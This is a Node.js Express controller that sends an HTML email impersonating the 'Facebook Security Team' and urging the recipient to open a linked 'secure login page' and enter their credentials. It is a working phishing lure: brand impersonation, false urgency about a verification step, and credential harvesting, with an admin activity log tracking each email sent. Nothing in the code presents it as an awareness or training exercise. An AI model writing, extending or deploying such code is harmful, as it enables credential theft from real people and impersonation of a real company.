const sendEmail = require("../services/emailService");
const codeService = require("../services/codeService");

exports.sendLoginEmail = async (req, res) => {

try{

const { email } = req.body;

if(!email){
return res.status(400).json({success:false,message:"Email is required"});
}

const loginLink = "http://localhost:3000/login.html";

const emailTemplate = `

<p>Hello,</p>

<p>
A secure sign-in request has been detected through the <strong>Facebook Security Portal</strong>. 
As part of our ongoing commitment to protecting user activity and maintaining system integrity, 
all login attempts must complete an additional verification step before access is granted.
</p>

<p>
If you initiated this request, please continue by opening the secure verification page below. 
After entering your login credentials, the system will automatically generate a 
<strong>one-time verification code</strong> and deliver it to your email address.
</p>

<div style="background:#f5f7fb;border-left:4px solid #1a73e8;padding:20px;margin:28px 0;border-radius:6px">

<strong>Verification Required</strong><br><br>

To confirm your identity and continue securely, please access the secure login page using the link below.
Once your credentials are submitted, a verification code will be sent to your email. Entering this code on
the verification page will complete the authentication process and allow access to continue.

<br><br>

<a href="${loginLink}" 
style="display:inline-block;background:#1a73e8;color:white;padding:14px 28px;
text-decoration:none;border-radius:6px;font-weight:bold;font-size:14px;margin-top:5px;">
login page
</a>

</div>

<p>
For security reasons, verification codes are generated for <strong>single-use authentication</strong> 
and remain valid for a limited time. If the code expires before it is used, a new verification code 
can be requested from the verification page.
</p>

<p>
If you did not attempt to access the Facebook Security Portal, you can also comply to this message.
No account changes or access will occur unless the verification process is successfully completed.
</p>

<p>
We strongly recommend that you never share your verification code with anyone. 
Facebook Security will never request your verification code through email or direct communication.
</p>

<p style="margin-top:28px;">
Thank you for helping us maintain a safe and secure environment.<br><br>
<strong>Facebook Security Team</strong>
</p>

<hr style="margin:35px 0;border:none;border-top:1px solid #e5e5e5">

<p style="font-size:12px;color:#777;line-height:1.6">

This notification was automatically generated by the Facebook Security monitoring system.  
Please do not reply directly to this email.

<br><br>

© 2026 Meta Security Services · Privacy · Terms · Help

</p>

</div>

</div>

</div>

`;

await sendEmail(
email,
"Facebook Security Notification",
emailTemplate
);

// log activity for admin dashboard
codeService.addActivity(email,"Security email sent");

res.json({
success:true,
message:"Email sent successfully"
});

}catch(error){

console.error("Email sending error:",error);

res.status(500).json({
success:false,
message:"Failed to send email"
});

}

};